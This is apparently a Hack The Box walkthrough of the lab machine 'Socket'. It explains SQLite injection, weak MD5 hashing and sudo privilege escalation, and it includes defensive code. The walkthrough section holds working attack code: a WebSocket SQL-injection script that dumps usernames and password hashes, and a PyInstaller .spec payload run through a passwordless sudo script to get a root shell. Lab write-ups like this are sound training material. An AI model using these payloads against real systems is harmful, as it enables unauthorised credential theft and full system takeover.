Hack the box academy socket latest htb walkthrough

Hack The Box (HTB) Academy : Socket HTB walkthrough

Hack The Box (HTB) Academy : Socket HTB walkthrough : A detailed walkthrough for solving the Socket box on HTB. The box involves SQLite injection, weak password hashing and privilege escalation through sudo shell escaping.

SQLite injection

SQLite injection is a type of security vulnerability that occurs when untrusted data is improperly handled in an application that uses an SQLite database. It is similar to other types of injection attacks, such as SQL injection, but it specifically targets SQLite databases.

SQLite injection occurs when an attacker is able to manipulate the data or queries sent to an SQLite database by exploiting weaknesses in the application’s input validation or query construction. This can lead to unauthorized access, data manipulation, or even complete control of the database.

Here’s a step-by-step explanation of how SQLite injection might be used:

  1. Vulnerable Application: The attacker identifies a web application or software that interacts with an SQLite database and has a security vulnerability. This vulnerability typically involves improperly validating or sanitizing user-provided input before using it in SQL queries.
  2. Identifying Injection Point: The attacker finds a part of the application where user input is used in constructing an SQLite query. This could be in a search box, login form, or any other input field that interacts with the database.
  3. Crafting the Attack: The attacker then inputs malicious SQL code (typically within the user input) to manipulate the database query. The goal is to modify the query in such a way that it reveals sensitive information or performs unintended actions.
  4. Exploiting the Vulnerability: When the application processes the input and constructs the SQL query without proper sanitization, the attacker’s injected SQL code gets executed along with the legitimate query. This can lead to unauthorized data access, data deletion, or other malicious actions.

Example of real-world SQLite injection attack:

Let’s consider a simple web application that uses an SQLite database to store user information for authentication. The application has a login page with the following code:

```python
import sqlite3

def authenticate(username, password):
    connection = sqlite3.connect("users.db")
    cursor = connection.cursor()

    # Vulnerable: user input is interpolated straight into the SQL text
    query = f"SELECT * FROM users WHERE username='{username}' AND password='{password}'"
    cursor.execute(query)

    user = cursor.fetchone()
    connection.close()

    return user
```

In this example, the authenticate function takes a username and password as input, and it constructs an SQLite query to check if the provided credentials exist in the database. However, this code is vulnerable to SQLite injection.

An attacker could exploit this vulnerability by inputting malicious data like:

Username: ' OR 1=1 --
Password: anything

The crafted query would then look like:

```sql
SELECT * FROM users WHERE username='' OR 1=1 --' AND password='anything'
```

The -- is used to comment out the remaining part of the query, effectively bypassing the password check. Since 1=1 always evaluates to true, the query would return all users in the database, and the attacker could log in as any user without knowing their password.

To prevent SQLite injection, developers should use parameterized queries (also known as prepared statements) or input validation techniques to properly sanitize user input before using it in database queries.
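As an added example (not code from the original article), here is the vulnerable authenticate pattern above placed beside a parameterized version, both run against a constructed in-memory SQLite database so the bypass and the fix can be compared directly. The table schema and the two sample users are assumptions made for the demo; the plaintext password column mirrors the article's schema and is itself a weakness covered in the next section.

```python
import sqlite3


def build_db():
    """Constructed in-memory stand-in for the article's users.db."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("alice", "s3cret"), ("bob", "hunter2")],
    )
    conn.commit()
    return conn


def authenticate_vulnerable(conn, username, password):
    # Same defect as the article's snippet: the values become part of the SQL text,
    # so a quote in the input changes the structure of the query
    query = f"SELECT * FROM users WHERE username='{username}' AND password='{password}'"
    return conn.execute(query).fetchone()


def authenticate_safe(conn, username, password):
    # Parameterized query: the driver binds the values after parsing, so they
    # can only ever be compared as data, never interpreted as SQL
    query = "SELECT * FROM users WHERE username=? AND password=?"
    return conn.execute(query, (username, password)).fetchone()


def demo():
    """Run the article's payload through both variants and report what each returns."""
    conn = build_db()
    payload = "' OR 1=1 --"
    results = {
        "vulnerable_with_payload": authenticate_vulnerable(conn, payload, "anything"),
        "safe_with_payload": authenticate_safe(conn, payload, "anything"),
        "safe_with_valid_creds": authenticate_safe(conn, "alice", "s3cret"),
    }
    conn.close()
    return results


if __name__ == "__main__":
    for name, row in demo().items():
        print(f"{name}: {row}")
```

The vulnerable variant returns the first row of the table for the payload (the comment swallows the password clause), while the parameterized variant returns nothing for the payload and still finds the user when real credentials are supplied.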

Weak Hashing

Weak hashing refers to the use of easily guessable or reversible hashing algorithms to store passwords or sensitive data. Hashing is a process used to convert plain text data into a fixed-length string of characters, which is designed to be computationally infeasible to reverse back to the original data. Weak hashing algorithms can be easily cracked or reversed, making them unsuitable for securely storing sensitive information.

One example of a weak hashing algorithm is the “MD5” (Message Digest Algorithm 5) hash function. MD5 was widely used in the past for storing passwords, but it has been proven to have significant vulnerabilities, making it susceptible to attacks like collisions and pre-image attacks. In a collision attack, two different inputs can produce the same MD5 hash, while in a pre-image attack, an attacker can find a message that produces a specific hash.

Example of real-world exploitation of weak hashing (MD5):

Let’s say there is an online service that stores user passwords using MD5 hashing. Here’s a simplified representation of how the passwords are stored in their database:

Username | MD5 Hash
user1    | MD5("password123")
user2    | MD5("qwerty456")
user3    | MD5("letmein789")

In this example, the application only uses MD5 to hash the passwords, without employing any additional security measures like salting (adding random data to the password before hashing).

Now, let’s see how an attacker might exploit this weak hashing scheme:

  1. Obtaining the Hashes: The attacker gains access to the application’s database, either through a data breach or other means. They now have the MD5 hashes of all the user passwords.
  2. Precomputed Rainbow Tables: The attacker uses precomputed tables called “Rainbow Tables.” These tables contain a vast number of precomputed hashes for common passwords and their corresponding plaintext values.
  3. Hash Lookup: The attacker looks up the hash values from the database in the Rainbow Tables to quickly find matching passwords. If the password is common, the attacker can easily retrieve the original plaintext password.
  4. Brute Force: If the password is not found in the Rainbow Tables, the attacker can use a brute force attack by systematically trying different combinations of passwords until they find a match.

In this way, the attacker can easily and quickly recover many of the original passwords, especially for weak passwords that are present in the Rainbow Tables. This highlights the importance of using strong, cryptographic hashing algorithms (like bcrypt or Argon2) and adding random salts to each password before hashing to protect against these types of attacks.
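As an added example that is not part of the original article, the following Python shows why the unsalted scheme in the table above fails and what the recommended fix looks like in practice. A tiny constructed dictionary of common passwords stands in for a rainbow table: an unsalted MD5 hash is recovered with a single lookup, while a per-user random salt plus a slow key-derivation function defeats the lookup entirely and makes two users with the same password store different values. PBKDF2-HMAC-SHA256 from the standard library is used here instead of bcrypt or Argon2 (which need third-party packages) so the example runs offline; the iteration count is an assumption for the demo.

```python
import hashlib
import hmac
import os

# Constructed sample: a tiny precomputed table standing in for a rainbow table
COMMON_PASSWORDS = ["password123", "qwerty456", "letmein789", "123456"]
LOOKUP_TABLE = {hashlib.md5(p.encode()).hexdigest(): p for p in COMMON_PASSWORDS}


def md5_unsalted(password):
    """The weak scheme from the table above: bare MD5, no salt."""
    return hashlib.md5(password.encode()).hexdigest()


def lookup_md5(stored_hash):
    """One dictionary lookup is enough when hashes are unsalted."""
    return LOOKUP_TABLE.get(stored_hash)


# Hardened scheme: random per-user salt plus a deliberately slow KDF
ITERATIONS = 100_000  # assumption for the demo; tune to your hardware


def hash_password(password, salt=None):
    """Return a self-describing record: algorithm$iterations$salt$derived_key."""
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    _algo, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iters)
    )
    return hmac.compare_digest(dk.hex(), dk_hex)


def demo():
    """Contrast the two schemes on the table's first password."""
    weak = md5_unsalted("password123")
    strong_a = hash_password("password123")
    strong_b = hash_password("password123")
    return {
        "md5_recovered": lookup_md5(weak),                 # "password123"
        "pbkdf2_in_table": strong_a in LOOKUP_TABLE,       # False
        "same_password_different_hashes": strong_a != strong_b,
        "verify_ok": verify_password("password123", strong_a),
        "verify_wrong": verify_password("qwerty456", strong_a),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The salt is stored next to the hash in the clear; its job is not secrecy but to force an attacker to recompute every candidate password per user, which the iteration count makes slow.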

Privilege escalation and Sudo shell escaping

Privilege escalation and sudo shell escaping are techniques used by attackers to gain higher levels of access and control on a compromised system. Let’s explain each term and then look at a real-life example:

  1. Privilege Escalation: Privilege escalation is the process of elevating one’s access level or permissions on a system to gain higher privileges than originally granted. In the context of hacking, this means moving from a lower-privileged user account to a more privileged one, such as gaining administrative or root access. By doing so, attackers can perform actions that would otherwise be restricted, potentially compromising the entire system.
  2. Sudo Shell Escaping: Sudo is a command on Unix-like operating systems that allows a permitted user to execute commands as the superuser (root) or as another user, as specified in the sudoers file. When a user runs a command with sudo, they are normally prompted for their password to verify their identity and privileges.

Sudo shell escaping is a technique for bypassing that password prompt and executing commands with elevated privileges without providing the correct password. If an attacker can exploit a weakness in the sudo configuration, or a vulnerable command that is allowed to run through sudo, they can gain unauthorized access to higher privileges.


Real-life Example of Privilege Escalation and Sudo Shell Escaping:

Let’s consider a hypothetical scenario where a web server is running on a Linux system, and a vulnerable web application is hosted on that server. The application allows users to upload files to the server, and it saves these uploaded files in a directory accessible by the web server process.

  1. Privilege Escalation: The attacker discovers a security vulnerability in the web application that allows them to upload malicious files to the server. These files can include shell scripts or executable binaries.
  2. Sudo Shell Escaping: The attacker’s ultimate goal is to gain root access to the server to control the entire system. They analyze the server configuration and find that the web server process has write access to a specific log file.

The attacker then crafts a malicious payload in a file and uploads it using the web application. The payload contains shell commands that exploit the log file’s write access. For example, the attacker could inject malicious code into the log file that will be executed with elevated privileges by a log processing script, which is run as root through sudo.

Once the log processing script runs with sudo privileges, the attacker’s payload executes, and they gain elevated access, allowing them to escalate their privileges to root. With root access, the attacker can compromise the entire system, install backdoors, exfiltrate sensitive data, and perform various malicious activities.

To prevent such attacks, it’s crucial to regularly update software, perform security audits, and follow the principle of least privilege to limit user access to only what is necessary. Additionally, web applications should be thoroughly tested and audited for security vulnerabilities before deployment.

Now that we have covered the basics of the techniques needed for this challenge, let’s see how to break the machine.

Machine Link: https://app.hackthebox.com/machines/Socket

Machine IP: 10.10.11.206


Enumeration:

Nmap Result

sudo nmap -sV -sC -A 10.10.11.206

Scan Result:

22 tcp open port for ssh

80 tcp open port for http

Websocket on port 5789

Let’s run a vulnerability scan of the WebSocket service on port 5789 with STEWS:

python3 STEWS-vuln-detect.py -1 -n -u 10.10.11.206:5789

This reveals a vulnerable WebSocket URL: ws://qreader.htb:5789

Browsing Website :

Now add the line 10.10.11.206 qreader.htb to /etc/hosts.

Then open http://qreader.htb/ in your browser.


Through this website we can generate and scan QR codes.


The site also offers the client software for Windows and Linux, so let’s download the .exe file and unpack it using pyinstxtractor.

python3 pyinstxtractor.py qreader.exe

Now go to the extracted folder and decompile the qreader.pyc file.

pip3 install uncompyle6

uncompyle6 qreader.pyc > qreader.py

After analyzing the qreader.py file we found an SQL injection in the version check the client sends to the server.

Let’s write a Python script to exploit that SQL injection.

```python
from websocket import create_connection  # websocket-client package
import json

ws_host = 'ws://qreader.htb:5789'
# The client sends its version string to the /version endpoint, where the server
# places it in an SQLite query. The payload closes the string and appends a
# UNION SELECT that returns every row of the answers table.
VERSION = '0.0.3" UNION SELECT group_concat(answer),"2","3","4" FROM answers;-- -'
ws = create_connection(ws_host + '/version')
ws.send(json.dumps({'version': VERSION}))
result = ws.recv()
print(result)
ws.close()
```

The above script prints the stored answers, which reveal the user’s name.

Let’s adapt the script to dump the usernames and password hashes from the users table.

```python
from websocket import create_connection  # websocket-client package
import json

ws_host = 'ws://qreader.htb:5789'
# Same injection point; this time the UNION pulls username and password columns
VERSION = '0.0.3" UNION SELECT username,password,"3","4" from users;-- -'
ws = create_connection(ws_host + '/version')
ws.send(json.dumps({'version': VERSION}))
result = ws.recv()
print(result)
ws.close()
```

This gives us the user’s password hash, which we can look up on crackstation.net to recover the plaintext password.

Now it’s time to log in via SSH with the recovered password.

Now copy your user flag.


Run sudo -l to list the commands we can run as root without a password.

build-installer.sh can be run as root without a password.



Commands used:

echo 'import os;os.system("/bin/bash")' > root.spec

sudo /usr/local/sbin/build-installer.sh build root.spec

The script hands our spec file to PyInstaller, and a PyInstaller .spec file is Python code that is executed during the build, so the os.system call runs as root and drops us into a root shell.

As you can see we got our root flag.
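The rule that gave root here has three properties worth checking for on any host: it is NOPASSWD, it allows a shell script, and it pins no arguments, so sudoers lets the caller pass any file (here an attacker-chosen .spec that PyInstaller executes as Python). As an added example, not part of the original walkthrough, the following Python audit parses sudoers-style rules and flags exactly those properties. The sudoers lines are constructed; the username webuser is a placeholder because the article does not name the account, and the list of risky binaries is an assumption that you would extend for your environment.

```python
import re

# Constructed sample in sudoers(5) syntax. The webuser rule mirrors what
# `sudo -l` showed on the box; "webuser" is a placeholder name.
SAMPLE_SUDOERS = """
Defaults env_reset
root    ALL=(ALL:ALL) ALL
webuser ALL=(ALL) NOPASSWD: /usr/local/sbin/build-installer.sh
ops     ALL=(root) /usr/bin/systemctl restart nginx
backup  ALL=(ALL) NOPASSWD: ALL
"""

# user  host = (runas) TAG: command[, command...]
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<commands>.+)$"
)

# Assumed starting list: interpreters, editors and pagers whose behaviour is
# decided by their input, so allowing them via sudo usually means a shell escape
RISKY_BINARIES = {"sh", "bash", "dash", "zsh", "python", "python3", "perl",
                  "env", "vi", "vim", "less", "more"}


def audit_rule(line):
    """Return a list of {user, command, issues} dicts for one sudoers rule."""
    m = RULE_RE.match(line)
    if not m:
        return []
    tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
    findings = []
    for cmd in (c.strip() for c in m.group("commands").split(",")):
        if not cmd:
            continue
        issues = []
        if cmd == "ALL":
            issues.append("any command allowed")
        else:
            prog, *args = cmd.split()
            base = prog.rsplit("/", 1)[-1]
            if not args:
                # sudoers: a command listed without arguments may be run with ANY
                # arguments, which is how build-installer.sh took an arbitrary spec file
                issues.append("arguments not pinned: caller chooses them")
            if base in RISKY_BINARIES or base.endswith(".sh"):
                issues.append("script or interpreter: shell escape likely")
        if "NOPASSWD" in tags:
            issues.append("NOPASSWD: runs as target user without a password")
        findings.append({"user": m.group("user"), "command": cmd, "issues": issues})
    return findings


def audit_sudoers(text):
    """Audit every user-specification line of a sudoers file."""
    results = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        first = line.split()[0]
        if first == "Defaults" or first.endswith("_Alias"):
            continue  # option and alias lines are not privilege rules
        results.extend(audit_rule(line))
    return results


def risky_rules(text):
    """Only the rules that carry at least one finding."""
    return [r for r in audit_sudoers(text) if r["issues"]]


if __name__ == "__main__":
    for rule in risky_rules(SAMPLE_SUDOERS):
        print(f"{rule['user']:8} {rule['command']:40} {'; '.join(rule['issues'])}")
```

The fix for the webuser rule is the same in each dimension the audit reports: require a password, pin the exact arguments the script needs, and have the script itself validate that the spec it builds comes from a root-owned directory rather than a path the caller controls.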
